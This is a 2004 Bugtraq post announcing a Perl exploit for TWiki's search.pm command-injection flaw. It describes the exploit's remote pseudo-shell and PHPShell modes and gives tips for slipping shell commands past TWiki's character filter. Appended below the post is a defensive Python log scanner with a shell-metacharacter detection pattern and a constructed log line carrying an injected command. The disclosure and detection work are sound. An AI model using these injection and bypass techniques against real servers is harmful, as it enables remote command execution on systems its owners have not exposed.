[37431] in bugtraq


TWiki exploit (search.pm / CAN-2004-1037)

daemon@ATHENA.MIT.EDU (Roman Medina-Heigl Hernandez)
Sat Nov 20 01:32:07 2004

From: Roman Medina-Heigl Hernandez <roman@rs-labs.com>
To: bugtraq@securityfocus.com
Date: Fri, 19 Nov 2004 21:12:00 +0100
Message-ID: <oqksp0t5ra56f6bat7nd9nvvk62jdpcf9i@4ax.com>



Hi Bugtraqers,

I discovered the recently published vulnerability in TWiki (read more about
it on [1]) and coded a simple working exploit some time ago. It is attached
here or you can download it from [2].

The exploit is written in Perl and has been tested on both Linux and Win32.
Run with no arguments to see supported options. It's beta but it works
(against TWiki "BeijingRelease" [3]; I did a quick test against "CairoRelease"
[4] and it didn't work against it).

In a normal run, it will open what I call a "pseudo-shell". It isn't really
a shell; each command that we enter is sent independently to the victim server
in a GET or POST request (yes, it works on POST, too) and the HTTP response is
parsed so that only the result of the command is shown (well, there are
some cases where it could fail). The second mode of operation is to create a
PHPShell for you; then you can use it to run arbitrary commands (the web server
must support PHP in this last case).

Please note that in pseudo-shell mode, some characters (like ">") are not
allowed because they are filtered by TWiki code. You can bypass this behaviour
by using some tricks, or use the PHP-shell mode, where you don't have any
restriction. For instance, in pseudo-shell mode, this won't work:
"echo hi > /tmp/greetz". But you can use something like
"echo hi | tee /tmp/greetz", which is quite similar and _does_ work. Another
way to bypass char restrictions is to invoke perl (read the exploit code; I've
used this trick to run the command that creates the file containing
PHPShell). There are more ways, just be creative.

I was in the process of adding a third method (a Win32/Unix compatible
connect-back shell) but I didn't have time to finish it. I'm still very busy so
this feature will have to wait for some time (it is not easy to bypass some
shortcomings in ActivePerl).

Btw, the exploit has proxy support (with or without auth) and basic HTTP auth,
and you can run it against HTTP or HTTPS servers. Give it a try! :-)

References:
[1] http://www.rs-labs.com/noticias/the_true_story_of_TWiki_vuln.txt
[2] http://www.rs-labs.com/exploitsntools/tweaky.pl
[3] http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Feb2003
[4] http://twiki.org/cgi-bin/view/Codev/TWikiRelease01Sep2004

Regards,
 --Roman

--
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]



Attachment: tweaky.pl (application/octet-stream, base64-encoded Perl script)

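As an added defensive example (not code from the original post or from the tweaky.pl attachment): a small Python scanner that flags requests to TWiki's search script whose search parameter carries shell metacharacters of the kind the post describes ("|" as in "| tee", backticks, "perl -e"), and separately flags POSTs to the same script, since access logs do not record the request body. It assumes Apache combined-log lines and the standard TWiki layout in which the search script sits under a path ending in /search; the log lines embedded below are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-log sample (not taken from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Nov/2004:21:12:00 +0100] "GET /cgi-bin/twiki/view/Main/WebHome HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
10.0.0.5 - - [19/Nov/2004:21:12:05 +0100] "GET /cgi-bin/twiki/search/Main/?scope=text&search=TWikiRelease HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
10.0.0.9 - - [19/Nov/2004:21:13:10 +0100] "GET /cgi-bin/twiki/search/Main/?scope=text&search=foo%27%20%3B%20id%20%7C%20tee%20%2Ftmp%2Fout HTTP/1.1" 200 1800 "-" "Mozilla/4.0"
10.0.0.9 - - [19/Nov/2004:21:13:20 +0100] "POST /cgi-bin/twiki/search/Main/ HTTP/1.1" 200 1800 "-" "Mozilla/4.0"
"""

# client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters/sequences that reach a shell but never belong in a wiki search string.
# The post notes TWiki filters ">" while "|" (e.g. "| tee") and perl -e get through.
SHELL_META = re.compile(r"[|;`'&]|\$\(|\bperl\s+-e\b")

def is_twiki_search(path):
    """Assumption: standard TWiki layout, search script at .../search or .../search/<Web>/."""
    return "/search/" in path or path.endswith("/search")

def inspect_line(line):
    """Return (client_ip, reason) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not is_twiki_search(url.path):
        return None
    if m.group("method") == "POST":
        # The access log carries no request body, so the search string cannot be
        # judged here; surface it for a request-body log or WAF event to confirm.
        return (m.group("ip"), "POST to search script: body not logged, inspect request-body log")
    for value in parse_qs(url.query).get("search", []):  # parse_qs percent-decodes values
        if SHELL_META.search(value):
            return (m.group("ip"), "shell metacharacters in search=" + value)
    return None

def scan_log(text):
    """Run inspect_line over every line and keep the hits in log order."""
    return [hit for hit in map(inspect_line, text.splitlines()) if hit]

if __name__ == "__main__":
    for ip, reason in scan_log(SAMPLE_LOG):
        print(ip, reason)
```

A rule that only looks for ">" redirection would miss the "| tee" form the post describes, which is why the pattern covers pipes, quotes and backticks as well.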
